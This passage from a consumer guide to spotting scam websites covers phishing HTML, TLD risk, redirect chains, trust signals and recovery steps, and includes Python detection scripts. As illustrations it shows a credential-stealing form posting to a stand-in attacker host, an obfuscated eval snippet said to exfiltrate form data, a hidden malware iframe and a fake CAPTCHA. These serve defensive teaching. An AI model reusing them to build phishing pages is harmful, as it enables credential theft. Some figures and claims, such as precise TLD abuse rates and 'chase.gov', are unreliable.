  <input type="email" name="email" required>
  <input type="password" name="password" required>
  <input type="text" name="ssn" placeholder="SSN for verification">
  <button type="submit">Log In</button>
</form>
<!-- ❌ Form posts to external domain -->
<!-- ❌ Requests unusual info (SSN) -->

Password Fields Without HTTPS:

<!-- Page URL: http://example.com (no HTTPS) -->
<input type="password" name="password">
<!-- ❌ Password transmitted in plaintext -->

JavaScript Obfuscation:

Legitimate JavaScript:

// Readable, minified but understandable
function validateForm(e){
  const email=document.getElementById("email").value;
  if(!email.includes("@")) {
    alert("Invalid email");
    return false;
  }
  return true;
}

Malicious JavaScript:

// Obfuscated, encoded, hidden functionality
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};
if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}
return p}('0.1("2").3=4+5.6("7");',8,8,'document|getElementById|pass|value|
evil_server|form|getAttribute|action'.split('|'),0,{}))

// Decoded behavior: Steals form data, sends to attacker's server

Red Flags:

  • eval() function (executes arbitrary code)
  • Base64 encoding: atob('aHR0cDovL2V2aWwuY29t')
  • Hexadecimal encoding: \x68\x74\x74\x70
  • Multiple layers of obfuscation
  • Minified variable names: _0x1a2b, $p1, __x

Hidden Elements:

Invisible iFrames:

<!-- Loads malicious content invisibly -->
<iframe src="https://malware-site.com/exploit"
        width="0"
        height="0"
        style="display:none">
</iframe>
<!-- ❌ Hidden iframe (delivers malware) -->

Fake CAPTCHA:

<!-- Looks like CAPTCHA but downloads malware -->
<div class="captcha">
  <p>Click "I'm not a robot" to continue</p>
  <button onclick="downloadMalware()">I'm not a robot</button>
</div>
<!-- ❌ Fake CAPTCHA triggers download -->

Meta Tag Analysis:

Legitimate Site:

<meta name="description" content="PayPal is the safer, easier way to pay online">
<meta name="author" content="PayPal Inc.">
<meta property="og:title" content="PayPal: Send Money, Pay Online or Set Up a Merchant Account">
<!-- ✅ Professional metadata -->

Scam Site:

<meta name="robots" content="noindex, nofollow">
<!-- ❌ Tells search engines not to index (hiding from Google) -->

<meta http-equiv="refresh" content="10;url=https://real-site.com">
<!-- ❌ Auto-redirects after stealing credentials -->

External Resource Loading:

Suspicious CDN Usage:

<!-- Legitimate -->
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<!-- ✅ Official jQuery CDN -->

<!-- Suspicious -->
<script src="https://unknown-cdn.xyz/jquery.js"></script>
<!-- ❌ Untrusted CDN (could be backdoored) -->

Content Delivery Networks Used:

Legitimate CDNs:
  ✅ cdnjs.cloudflare.com
  ✅ cdn.jsdelivr.net
  ✅ unpkg.com
  ✅ code.jquery.com

Suspicious:
  ❌ Random domains
  ❌ Newly registered CDNs
  ❌ Offshore hosting
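The content checks from this section (form posting off-domain, password field on plain HTTP, unusual data requests, hidden iframes, meta refresh and noindex, scripts from unknown hosts, urgency language) as one Python scanner built on the standard library's HTMLParser. This is an added example, not the Scam Detector's code; the two HTML pages are constructed from the snippets above, and the CDN allow-list and keyword list are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed phishing page combining the snippets above (not a real site)
SAMPLE_PHISH_HTML = """
<html><head><title>PayPal - Verify</title>
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="refresh" content="10;url=https://www.paypal.com">
<script src="https://unknown-cdn.xyz/jquery.js"></script></head>
<body><h1>URGENT: Your account will be suspended!</h1>
<form action="https://evil-server.com/steal.php" method="POST">
  <input type="email" name="email" required>
  <input type="password" name="password" required>
  <input type="text" name="ssn" placeholder="SSN for verification">
  <button type="submit">Log In</button>
</form>
<iframe src="https://malware-site.com/exploit" width="0" height="0" style="display:none"></iframe>
</body></html>
"""

# Constructed legitimate page: same-origin form, script from a known CDN
SAMPLE_LEGIT_HTML = """
<html><head><script src="https://code.jquery.com/jquery-3.6.0.min.js"></script></head>
<body><form action="https://www.paypal.com/signin" method="POST">
  <input type="email" name="email" required>
  <input type="password" name="password" required>
  <button type="submit">Log In</button>
</form></body></html>
"""

URGENCY_KEYWORDS = ("urgent", "immediately", "within 24 hours", "suspended", "locked",
                    "unusual activity", "suspicious login", "act fast")
SENSITIVE_FIELDS = ("ssn", "social security", "routing", "date of birth", "dob")
KNOWN_CDNS = {"cdnjs.cloudflare.com", "cdn.jsdelivr.net", "unpkg.com", "code.jquery.com"}


class PhishingScanner(HTMLParser):
    """Collects the content-level red flags described in this section."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.page_scheme = urlparse(page_url).scheme
        self.findings = []
        self.keywords_seen = set()

    def _host_of(self, url):
        return urlparse(urljoin(self.page_url, url)).hostname

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}     # boolean attrs (required) arrive as None
        if tag == "form":
            host = self._host_of(a.get("action", ""))
            if host and host != self.page_host:
                self.findings.append(f"form posts to external domain {host}")
        elif tag == "input":
            if a.get("type", "").lower() == "password" and self.page_scheme != "https":
                self.findings.append("password field on a non-HTTPS page (sent in plaintext)")
            label = (a.get("name", "") + " " + a.get("placeholder", "")).lower()
            if any(s in label for s in SENSITIVE_FIELDS):
                self.findings.append(f"form requests unusual data: {a.get('name')!r}")
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if a.get("width") == "0" or a.get("height") == "0" or "display:none" in style:
                self.findings.append(f"hidden iframe loading {a.get('src')}")
        elif tag == "meta":
            if a.get("http-equiv", "").lower() == "refresh":
                self.findings.append(f"meta refresh redirect: {a.get('content')}")
            if a.get("name", "").lower() == "robots" and "noindex" in a.get("content", "").lower():
                self.findings.append("robots noindex (page hidden from search engines)")
        elif tag == "script" and a.get("src"):
            host = self._host_of(a["src"])
            if host and host != self.page_host and host not in KNOWN_CDNS:
                self.findings.append(f"script loaded from untrusted host {host}")

    def handle_data(self, data):
        text = data.lower()
        self.keywords_seen.update(k for k in URGENCY_KEYWORDS if k in text)


def scan_html(page_url, html):
    """Return the list of red flags found in `html` as served at `page_url`."""
    scanner = PhishingScanner(page_url)
    scanner.feed(html)
    scanner.close()
    findings = list(scanner.findings)
    if scanner.keywords_seen:
        findings.append("urgency language: " + ", ".join(sorted(scanner.keywords_seen)))
    return findings
```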

5. TLD (Top-Level Domain) Risk Assessment

TLD Abuse Statistics:

High-Risk TLDs (Free/Cheap Domains):

TLD     Cost       Abuse Rate   Common Scams
──────────────────────────────────────────────────────
.tk     FREE       94%          Phishing, malware, spam
.ml     FREE       92%          Phishing, fake stores
.ga     FREE       91%          Malware distribution
.cf     FREE       90%          Phishing attacks
.gq     FREE       89%          Spam, phishing
.xyz    $1-2/yr    45%          Cryptocurrency scams
.top    $2-3/yr    42%          Fake investment sites
.club   $3-5/yr    38%          Adult scams, fake clubs

Why Free TLDs are Risky:

  • No registration barriers (instant signup)
  • No identity verification required
  • Easy to abandon after scam
  • Registrars have weak abuse policies
  • Freenom (.tk, .ml, .ga, .cf, .gq) has shut down, but domains it already registered still exist

Medium-Risk TLDs:

TLD       Risk   Notes
───────────────────────────────────────────────────
.info     35%    Information sites, but heavily abused
.biz      32%    Business sites, many fake businesses
.online   30%    Generic, popular with scammers
.site     28%    Generic, low entry barrier
.store    25%    E-commerce, many fake stores

Low-Risk TLDs:

TLD     Risk     Notes
──────────────────────────────────────────────────────────
.com    8%       Most common, still has scams but lower %
.net    7%       Network services, established reputation
.org    6%       Organizations, non-profits (better vetted)
.edu    <1%      Educational institutions (strict verification)
.gov    <0.1%    Government entities (extremely strict)
.mil    0%       Military (impossible to fake)

Country-Code TLDs (ccTLDs):

High-Risk ccTLDs (Abused):

.pw (Palau)       → Free, heavily abused
.cc (Cocos Islands) → Cheap, popular with scammers
.ws (Samoa)       → "Website" marketed, abused
.to (Tonga)       → URL shorteners, phishing
.ru (Russia)      → High malware distribution
.cn (China)       → Often used for fake stores

Low-Risk ccTLDs (Well-Managed):

.uk (United Kingdom) → Strong registry policies
.de (Germany)        → Requires local presence
.jp (Japan)          → Strict verification
.au (Australia)      → Identity verification required
.nl (Netherlands)    → Well-regulated
.ca (Canada)         → Canadian presence required

Specialized TLDs:

Trusted (Verified Entities):

.bank  → Only real banks (verified by fTLD Registry)
.insurance → Insurance companies only
.lawyer → Verified legal professionals
.pharmacy → Licensed pharmacies
.hospital → Healthcare facilities

Suspicious (Cheap, Generic):

.win   → "Win prizes!" scams
.loan  → Predatory lending scams
.click → Clickbait, malware
.download → Software scams, malware
.review → Fake review sites

TLD Red Flags:

def assess_tld_risk(domain):
    """Classify a hostname by its top-level domain using the risk tiers above.
    Accepts a bare hostname; ignores case and a trailing dot (example.com.)."""
    tld = domain.strip().rstrip('.').rsplit('.', 1)[-1].lower()

    # Critical risk: the (formerly free) Freenom TLDs
    if tld in ['tk', 'ml', 'ga', 'cf', 'gq']:
        return 'CRITICAL - Free domain, 90%+ scam rate'

    # High risk: cheap generic TLDs
    if tld in ['xyz', 'top', 'club', 'win', 'loan']:
        return 'HIGH - Cheap domain, 40%+ scam rate'

    # Medium risk: generic TLDs with a low entry barrier
    if tld in ['info', 'biz', 'online', 'site']:
        return 'MEDIUM - Verify independently'

    # Low risk: common TLDs (scams exist here too, so keep checking)
    if tld in ['com', 'net', 'org']:
        return 'LOW - Common TLD, still verify'

    # Trusted: registries that verify the registrant's identity
    if tld in ['gov', 'edu', 'mil', 'bank']:
        return 'TRUSTED - Verified entity'

    return 'UNKNOWN - Research this TLD'

Real-World Examples:

Legitimate:

paypal.com      → .com (low risk TLD) ✅
chase.gov       → .gov (impossible to fake) ✅
harvard.edu     → .edu (verified university) ✅

Scam:

paypal-verify.tk    → .tk (free, 94% scam rate) ❌
amazon-deals.xyz    → .xyz (cheap, high abuse) ❌
apple-support.ml    → .ml (free, 92% scam rate) ❌

6. HTTP Redirect Chain Analysis

What are Redirects?

HTTP Status Codes:

301 Moved Permanently    → Permanent redirect (SEO-friendly)
302 Found                → Temporary redirect
303 See Other            → Redirect after POST
307 Temporary Redirect   → Preserves method (POST stays POST)
308 Permanent Redirect   → Preserves method

Legitimate Redirect Examples:

HTTP → HTTPS Upgrade:

User types: http://example.com
Redirect 1: 301 → https://example.com
Final: HTTPS site loads
✅ Good: Enforcing encryption

www → non-www (or vice versa):

User types: www.example.com
Redirect 1: 301 → example.com
Final: Canonical domain
✅ Good: URL canonicalization

Suspicious Redirect Patterns:

Multiple Redirects (Chain):

User clicks: http://click-here.com
Redirect 1: 302 → http://tracker1.com/?id=12345
Redirect 2: 302 → http://tracker2.com/?ref=ad
Redirect 3: 302 → http://affiliate.com/?src=email
Redirect 4: 302 → http://scam-site.com/
Final: Phishing page

❌ Bad: 4+ redirects (hiding true destination)

Cross-Domain Redirects:

User expects: Login to bank.com
Redirect 1: bank-security.com (fake domain)
Redirect 2: verify-bank.net (fake domain)
Final: bank.com (back to real domain, but credentials stolen)

❌ Bad: Redirects to different domains

Redirect Loop:

http://site-a.com → http://site-b.com
http://site-b.com → http://site-a.com
[Infinite loop until browser timeout]

❌ Bad: Broken configuration or intentional DoS

Testing Redirects:

cURL Method:

# Follow redirects and show each hop
curl -L -v https://example.com 2>&1 | grep -E "(< HTTP|< Location)"

# Output:
< HTTP/1.1 301 Moved Permanently
< Location: https://www.example.com/
< HTTP/1.1 200 OK

# Analysis:
# 1 redirect (301) from example.com to www.example.com
# ✅ Normal behavior

Browser DevTools:

1. Open DevTools (F12)
2. Network tab
3. Visit suspicious link
4. Check redirect chain:
   - Count number of redirects
   - Check each domain in chain
   - Look for cross-domain redirects

Python Script:

import requests

def analyze_redirects(url):
    """Follow every redirect from url and rate the chain by its length."""
    try:
        response = requests.get(url, allow_redirects=True, timeout=10)
    except requests.RequestException as exc:
        print(f"❌ Request failed: {exc}")
        return None

    hops = len(response.history)  # one entry per redirect response
    print(f"Original URL: {url}")
    print(f"Final URL: {response.url}")
    print(f"Redirect count: {hops}")

    for i, redirect in enumerate(response.history, 1):
        print(f"Redirect {i}: {redirect.status_code} → {redirect.headers.get('Location')}")

    # Risk assessment by chain length alone (thresholds from the Redirect Red Flags table)
    if hops == 0:
        print("✅ No redirects (direct access)")
    elif hops <= 2:
        print("✅ Normal redirects (HTTP→HTTPS, www)")
    elif hops <= 5:
        print("⚠️  Suspicious (3-5 redirects, verify destination)")
    else:
        print("❌ High risk (6+ redirects, likely scam)")
    return response

# Test
analyze_redirects("http://suspicious-site.com")

Redirect Red Flags:

Red Flag                    Risk Level   Explanation
────────────────────────────────────────────────────────────────────
0-2 redirects              ✅ Normal     HTTP→HTTPS, www canonicalization
3-5 redirects              ⚠️  Medium    Ad tracking, affiliate links
6+ redirects               ❌ High       Hiding destination, scam likely
Cross-domain redirects     ❌ High       Multiple different domains
Redirect to different TLD  ❌ Critical   .com → .tk (domain change)
Redirect loop              ❌ Critical   Broken or malicious
Redirect after form submit ❌ Critical   Credential theft then redirect

Real-World Scam Example:

Phishing Email Link:

Email text: "Click here to verify your PayPal account"
Link shown: paypal.com/verify (FAKE - hover shows real URL)
Real URL: http://paypal-verify[.]tk/check

Redirect chain:
1. http://paypal-verify.tk/check
   → 302 redirect
2. http://tracker.xyz/?id=victim123
   → 302 redirect (logs IP, browser)
3. http://paypa1.com/signin
   → Final destination (fake PayPal login)

Stolen data:
   - Credentials entered on fake paypa1.com
   - Victim info logged by tracker.xyz
   - 30 seconds later, site shuts down
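The Redirect Red Flags table and the phishing chain above, implemented as an added example (not part of this guide's tooling): it rates a chain of URLs offline, so nothing is requested from the suspicious site. `registrable_domain` approximates the registrable domain with the last two hostname labels (an assumption; no public-suffix list is used), and the three chains at the bottom are constructed from the examples in this section.

```python
from urllib.parse import urlsplit

# Free TLDs from the TLD risk section of this guide
FREE_TLDS = {"tk", "ml", "ga", "cf", "gq"}

# Risk levels in increasing order of severity
LEVELS = ["Normal", "Medium", "High", "Critical"]


def registrable_domain(url):
    """Last two hostname labels, e.g. 'tracker.xyz' for http://a.tracker.xyz/?id=1.
    Assumption: no public-suffix list, so suffixes such as co.uk are approximated."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def tld_of(url):
    return registrable_domain(url).rsplit(".", 1)[-1]


def assess_chain(chain):
    """Apply the red-flag table to a redirect chain.

    chain: URLs in order, from the link the user clicked to the page that
    finally loaded. Returns the redirect count, the highest risk level
    reached and one finding per rule that fired.
    """
    level = "Normal"
    findings = []

    def flag(new_level, text):
        nonlocal level
        if LEVELS.index(new_level) > LEVELS.index(level):
            level = new_level
        findings.append(f"{new_level}: {text}")

    redirects = len(chain) - 1
    if redirects >= 6:
        flag("High", f"{redirects} redirects, likely hiding the destination")
    elif redirects >= 3:
        flag("Medium", f"{redirects} redirects, typical of ad or affiliate tracking")

    # Cross-domain hops: every distinct registrable domain in the chain
    domains = []
    for url in chain:
        d = registrable_domain(url)
        if d not in domains:
            domains.append(d)
    if len(domains) > 1:
        flag("High", "cross-domain redirects: " + " -> ".join(domains))

    # TLD change between the clicked link and the final page
    if tld_of(chain[0]) != tld_of(chain[-1]):
        flag("Critical", f"TLD changed .{tld_of(chain[0])} -> .{tld_of(chain[-1])}")

    # Loop: the same scheme + host + path appears twice in the chain
    seen = set()
    for url in chain:
        p = urlsplit(url)
        key = (p.scheme, p.hostname, p.path or "/")
        if key in seen:
            flag("Critical", f"redirect loop through {url}")
            break
        seen.add(key)

    # Final destination on a free TLD (rated critical in the TLD section)
    if tld_of(chain[-1]) in FREE_TLDS:
        flag("Critical", f"final destination on free TLD .{tld_of(chain[-1])}")

    return {"redirects": redirects, "level": level, "findings": findings}


def chain_from_response(response):
    """Build the URL chain from a requests.Response (history plus final URL)."""
    return [r.url for r in response.history] + [response.url]


# Constructed chains: the phishing example above, a benign canonicalisation
# and the redirect loop shown earlier in this section
SCAM_CHAIN = [
    "http://paypal-verify.tk/check",
    "http://tracker.xyz/?id=victim123",
    "http://paypa1.com/signin",
]
BENIGN_CHAIN = ["http://example.com", "https://www.example.com/"]
LOOP_CHAIN = ["http://site-a.com", "http://site-b.com", "http://site-a.com"]

if __name__ == "__main__":
    for name, chain in [("scam", SCAM_CHAIN), ("benign", BENIGN_CHAIN), ("loop", LOOP_CHAIN)]:
        result = assess_chain(chain)
        print(f"{name}: {result['level']} ({result['redirects']} redirects)")
        for finding in result["findings"]:
            print("  -", finding)
```

Note that the scam chain has only two redirects, which the count rule alone rates as normal; the cross-domain and TLD-change rules are what push it to Critical.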

How to Trace Real URL:

Hover Before Clicking:

Browser shows link destination in bottom-left corner
Compare: Displayed text vs actual URL

Display: paypal.com
Actual:  http://paypal-verify.tk
❌ Mismatch = Scam

URL Expanders:

Shortened URLs (bit.ly, tinyurl.com) hide destination

Before clicking:
1. Copy shortened URL
2. Paste into: https://www.expandurl.net/
3. View real destination
4. Check if legitimate

7. Contact Information & Trust Signals

What We Verify:

Physical Address:

Legitimate:
  123 Main Street
  Suite 400
  San Francisco, CA 94105
  United States

  Verification:
  1. Google Maps: Street View shows real building ✅
  2. Business registry: Matches state records ✅
  3. Phone verification: Listed number connects ✅

Scam:
  "123 Main St, USA" (vague, incomplete) ❌
  PO Box only (no physical location) ❌
  Residential address (not business) ❌
  Fake address (Google Maps: empty lot) ❌

Phone Number:

Legitimate:
  +1 (800) 123-4567

  Checks:
  ✅ Country code matches business location
  ✅ Toll-free (800, 888, 877) for customer service
  ✅ Listed on official company website
  ✅ Connects to real call center

Scam:
  No phone number listed ❌
  Only email contact ❌
  Foreign country code for "US business" ❌
  Disconnected number ❌
  VoIP/burner number ❌

Email Address:

Legitimate:
  support@paypal.com
  └─ @paypal.com (matches company domain) ✅

Scam:
  support@paypal-secure.tk ❌ (different domain)
  contact@gmail.com ❌ (free email provider)
  noreply@company.info ❌ (suspicious TLD)

Social Media Presence:

Legitimate:
  ✅ Verified accounts (blue checkmark)
  ✅ Thousands of followers
  ✅ Regular posting (not abandoned)
  ✅ Customer interactions
  ✅ Established accounts (years old)

Scam:
  ❌ No social media presence
  ❌ Recently created accounts (<30 days)
  ❌ Few followers (<100)
  ❌ Stock photos, no real engagement
  ❌ No verification badge

Business Registration:

US Businesses:
1. Secretary of State lookup (each state)
   Example: https://businesssearch.sos.ca.gov/
2. Search: Company name
3. Verify:
   - Active status ✅
   - Registration date (matches WHOIS)
   - Registered agent address
   - Business type (LLC, Corporation, etc.)

No registration found = Not a real business ❌

Trust Seals & Certifications:

Legitimate Seals:

✅ BBB Accredited Business (verify at bbb.org)
✅ Norton Secured (verify SSL certificate)
✅ TRUSTe Privacy Certified
✅ McAfee Secure
✅ SSL.com certificate badge

Verification:
- Click seal → Should link to verification page
- Scams use fake images that don't link

Fake Seals:

❌ Image-only badges (no link)
❌ Links to fake verification pages
❌ Misspelled certification names
❌ Seals for non-existent organizations

Privacy Policy & Terms:

Legitimate:

✅ Detailed privacy policy (5+ pages)
✅ Legal language (attorney-drafted)
✅ Specific data collection practices
✅ GDPR/CCPA compliance mentioned
✅ Recent update date
✅ Contact information for privacy officer

Example: https://www.paypal.com/privacy

Scam:

❌ No privacy policy
❌ Generic template (copied from another site)
❌ 1-2 paragraphs only
❌ No specific company details
❌ Broken English, grammar errors
❌ No update date or very old

About Us Page:

Legitimate:

✅ Company history (founded when, by whom)
✅ Team photos (real people, searchable on LinkedIn)
✅ Office locations with addresses
✅ Awards, certifications, partnerships
✅ Press mentions (verify with Google News)

Example: https://www.amazon.com/about

Scam:

❌ Stock photos labeled as "our team"
❌ Vague history ("established to serve customers")
❌ No verifiable information
❌ Copied text from other sites
❌ No real names or bios

Customer Reviews:

Where to Check:

1. Google Reviews (Google Maps)
2. Trustpilot (trustpilot.com)
3. Better Business Bureau (bbb.org)
4. Reddit (search: "[company name] scam")
5. ScamAdviser (scamadviser.com)

Legitimate Reviews:

✅ Mix of positive and negative (realistic)
✅ Detailed, specific feedback
✅ Varied writing styles
✅ Posted over months/years
✅ Verified purchase tags
✅ Company responds to reviews

Fake Reviews:

❌ All 5-star reviews (too perfect)
❌ Generic text ("Great product!", "Highly recommend")
❌ Same writing style/grammar
❌ All posted on same dates (bulk upload)
❌ No verified purchases
❌ No company responses

Tools and Resources

Official Scam Detection Tools

Orbit2x Scam Detector:

  • 👉 Analyze Website Safety Now
  • Features:
    • 7-point security analysis
    • SSL certificate validation
    • Domain age WHOIS lookup
    • DNS health check
    • Phishing pattern detection
    • TLD risk assessment
    • Redirect chain analysis
    • Risk scoring (0-100)
    • Instant results (5-30 seconds)
    • Detailed breakdown of findings

Best Practices and Quick Reference

Scam Detection Rules of Thumb

Always check HTTPS (but know HTTPS ≠ safe)
Verify domain spelling (paypal.com not paypa1.com)
Check domain age (<30 days = high risk)
Look for contact info (phone, address, email)
Search “[company] scam” on Google
Trust your instincts (too good = too fake)
Use credit cards (not wire transfer, crypto, gift cards)
Enable 2FA (limits damage if credentials stolen)

Quick Decision Matrix

Indicator     Safe               Suspicious           Scam
──────────────────────────────────────────────────────────────────
HTTPS         Valid SSL          Self-signed          None
Domain Age    1+ years           30-365 days          <30 days
WHOIS         Public info        Privacy protected    Offshore
Contact       Full details       Email only           None
Reviews       Mixed, detailed    Few, generic         None/fake
Price         Market rate        20-30% off           50-90% off
Payment       Credit card        PayPal               Wire/crypto only

Red Flag Checklist

Immediate Warnings (Close Site):

  • No HTTPS or “Not Secure” warning
  • Misspelled domain (g00gle.com, amaz0n.com)
  • Free TLD (.tk, .ml, .ga, .cf, .gq)
  • “Urgent!” or “Account suspended!” language
  • Requests SSN, passwords, or banking via email
  • Payment only via wire transfer, crypto, gift cards
  • Price too good to be true (iPhone for $99)

Verify Independently:

  • Domain age less than 90 days
  • Privacy-protected WHOIS
  • No phone number or physical address
  • No social media presence
  • Generic “About Us” page
  • Stock photos labeled as team
  • Only positive reviews (no negatives)

What to Do If You’ve Been Scammed

Immediate Actions (First Hour):

1. Document Everything:

- Screenshot website (full page)
- Save all emails
- Copy transaction IDs
- Note dates, times, amounts
- Save chat logs

2. Contact Financial Institutions:

Credit Card:
  - Call issuer immediately
  - Request chargeback
  - Freeze card

Bank Account:
  - Report unauthorized transactions
  - Request account freeze
  - File fraud claim

PayPal/Venmo:
  - Report transaction
  - Request buyer protection

3. Change Passwords:

Priority order:
1. Email (most critical)
2. Banking/financial
3. Social media
4. Shopping accounts
5. All other accounts

Enable 2FA on all accounts

Report to Authorities (First Day):

4. File Official Reports:

Federal Trade Commission:
  https://reportfraud.ftc.gov/
  - Select scam type
  - Provide details
  - Upload evidence

FBI IC3:
  https://www.ic3.gov/
  - Financial crimes
  - Dollar amounts
  - Suspect information

Local Police:
  - File report (get case number)
  - Needed for identity theft affidavit

5. Credit Monitoring (First Week):

Fraud Alert:
  - Contact one credit bureau
  - 1-year fraud alert placed
  - Free, renewable

Credit Freeze:
  - Equifax: equifax.com/freeze
  - Experian: experian.com/freeze
  - TransUnion: transunion.com/freeze
  - Prevents new accounts

Monitor:
  - Free annual reports: annualcreditreport.com
  - Check for unauthorized accounts
  - Dispute fraudulent entries

Long-Term Protection:

6. Identity Theft Recovery (Ongoing):

IdentityTheft.gov:
  - FTC recovery plan
  - Step-by-step guide
  - Customized checklist
  - Letters to creditors

7. Scam Site Takedown:

Report to registrar:
  - WHOIS lookup → Find registrar
  - Submit abuse complaint
  - Include evidence

Report to hosting:
  - IP WHOIS → Find host
  - Email abuse@[hosting-company]
  - Request takedown

Google Safe Browsing:
  - Submit malicious URL
  - Google may block in Chrome

Prevention for Future:

  • Use password manager (unique passwords)
  • Enable 2FA everywhere
  • Use virtual credit cards (Privacy.com, Revolut)
  • Check URLs before clicking
  • Verify independently (don’t trust emails)
  • Use our Scam Detector before entering info

Conclusion: Protecting Yourself from Online Scams

Key Takeaways

1. Scams are Sophisticated and Growing

  • $10.3 billion lost in 2023 (up 17% from 2022)
  • 467,000 new phishing sites monthly
  • Even HTTPS sites can be scams (80% of phishing uses HTTPS)
  • Social engineering exploits psychology, not just technology

2. Multi-Factor Analysis is Essential

  • No single indicator is definitive (use all 7 checks)
  • SSL + Domain Age + DNS + Content = Comprehensive assessment
  • Automated tools reduce human error and save time
  • Risk scoring provides objective measurement

3. Domain Age is the Strongest Indicator

  • 97% of phishing sites use domains <30 days old
  • Legitimate businesses have established web presence
  • Check WHOIS before entering any personal information

4. Trust Your Instincts

  • If it seems too good to be true, it is
  • Urgency is a red flag (legitimate sites don’t threaten)
  • Verify independently (don’t click email links)
  • When in doubt, don’t proceed

5. Use the Right Tools

Scam Prevention Checklist

Before Entering Personal Info:

  • Run scam detector analysis (7-point check)
  • Verify domain spelling exactly
  • Check domain age (>30 days minimum)
  • Confirm HTTPS with valid certificate
  • Search “[company name] scam” on Google
  • Verify contact information (phone, address)
  • Check reviews on independent sites
  • Confirm payment methods (credit card available)

For Online Shopping:

  • Domain age >90 days
  • Business registration verified
  • Physical address exists (Google Maps)
  • Phone number connects
  • Return policy clearly stated
  • Credit card payment available
  • Realistic pricing (not 70%+ off)

For Financial Transactions:

  • Navigate directly to site (don’t click email links)
  • Verify URL in address bar
  • Check for EV certificate (green bar for banks)
  • Confirm 2FA is required
  • Call bank using number on card (not email)

Next Steps

1. Test Suspicious Sites:
👉 Analyze Website Now

  • Enter URL for instant analysis
  • Review 7-point security check
  • Get risk score (0-100)
  • View detailed breakdown


Frequently Asked Questions (FAQ)

Q: How can I tell if a website is a scam?

A: Use a multi-factor approach combining technical and behavioral indicators:

Instant Red Flags (99% Scam):

  1. No HTTPS or “Not Secure” warning in browser
  2. Misspelled domain: paypa1.com, g00gle.com (number substitution)
  3. Free TLD: .tk, .ml, .ga, .cf, .gq domains
  4. Urgent language: “Account suspended!”, “Verify now or lose access!”
  5. Impossible prices: iPhone 15 for $99, Rolex for $50
  6. Wire transfer only: No credit card, only crypto/wire/gift cards

Technical Verification Steps:

Step 1: Check Domain Age (Most Important)

Use our Domain Age Checker: /domain-age

High Risk: 0-30 days old (97% of scams)
Medium Risk: 31-90 days (verify independently)
Low Risk: 91+ days (still verify other factors)
Trusted: 1+ years old

Step 2: Validate SSL Certificate

Click padlock icon → View certificate
Check:
  ✅ Issued to correct domain (exact match)
  ✅ Valid date range (not expired)
  ✅ Trusted CA (Let's Encrypt, DigiCert, etc.)
  ❌ Self-signed (scam indicator)

Step 3: Verify Contact Information

Look for:
  ✅ Physical address (verify on Google Maps)
  ✅ Phone number (call to verify)
  ✅ Company email (@company.com, not @gmail.com)
  ❌ No contact info (major red flag)
  ❌ Only email contact

Step 4: Search for Scam Reports

Google: "[company name] scam"
Check: Reddit, BBB, Trustpilot, ScamAdviser

Red flags:
  - Multiple scam reports
  - BBB complaints
  - Reddit warnings
  - No online presence (for "established" business)

Step 5: Use Automated Tools

Our Scam Detector: /scam-detector
Provides:
  - 7-point security analysis
  - Risk score (0-100)
  - SSL validation
  - Domain age check
  - DNS analysis
  - Phishing detection
  - TLD risk assessment

Decision Matrix:

Risk Score   Meaning          Action
──────────────────────────────────────────────
0-19         Low Risk         Proceed with caution
20-44        Medium Risk      Verify independently
45-69        High Risk        Avoid personal info
70-100       Critical Risk    Close immediately

When in Doubt:

  • Don’t enter personal information
  • Call company using number from official website (not email)
  • Search for official social media to verify
  • Check BBB, Trustpilot, Google Reviews
  • Trust your instincts (if it feels wrong, it probably is)
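Instant Red Flags 1 to 3 above (no HTTPS, number-substituted brand names, free TLDs) as an added example that is not part of this guide's tooling. The brand watch-list is a constructed four-entry sample (real checkers carry far larger lists), the substitution table is an assumption about which digits and symbols stand in for letters, and the substring match is deliberately aggressive, so it will also flag innocent names that happen to contain a brand.

```python
from urllib.parse import urlsplit

# Constructed watch-list: brand -> its official domain
OFFICIAL = {
    "paypal": "paypal.com",
    "google": "google.com",
    "amazon": "amazon.com",
    "apple": "apple.com",
}

# Free TLDs from the TLD section of this guide
FREE_TLDS = {"tk", "ml", "ga", "cf", "gq"}

# Digits and symbols substituted for look-alike letters
# (paypa1 -> paypal, g00gle -> google, amaz0n -> amazon); assumed table
SUBSTITUTIONS = str.maketrans(
    {"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "$": "s", "@": "a"}
)


def normalize_label(label):
    """Undo digit/symbol substitutions so lookalikes compare equal to the brand."""
    return label.lower().translate(SUBSTITUTIONS)


def instant_red_flags(url):
    """Return the list of instant red flags raised by a URL or bare hostname."""
    had_scheme = "://" in url
    parts = urlsplit(url if had_scheme else "http://" + url)
    host = (parts.hostname or "").lower().rstrip(".")
    flags = []

    # Flag 1: no HTTPS (only meaningful when the link carried a scheme)
    if had_scheme and parts.scheme != "https":
        flags.append("no HTTPS")

    labels = host.split(".")
    tld = labels[-1]
    registrable = ".".join(labels[-2:])

    # Flag 3: free TLD
    if tld in FREE_TLDS:
        flags.append(f"free TLD .{tld}")

    # Flag 2: a brand name that is not on the brand's own domain
    for brand, official in OFFICIAL.items():
        if registrable == official:
            continue  # the genuine site, including subdomains such as www
        for label in labels[:-1]:
            norm = normalize_label(label)
            if norm == brand and label != brand:
                flags.append(f"digit-substitution lookalike of {brand}: {label}")
            elif brand in norm:
                flags.append(f"'{brand}' in domain {host}, which is not {official}")
    return flags


if __name__ == "__main__":
    for sample in ["https://www.paypal.com/signin", "http://paypa1.com/signin",
                   "http://paypal-verify.tk/check", "https://g00gle.com"]:
        print(sample, "->", instant_red_flags(sample) or "no instant red flags")
```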

Q: Can a website with HTTPS still be a scam?

A: YES! HTTPS does NOT guarantee legitimacy.

The Misconception:
Many people believe: “Padlock icon = Safe website” ❌ FALSE

The Reality:

  • 80% of phishing sites now use HTTPS
  • Let’s Encrypt provides free SSL certificates to anyone (including scammers)
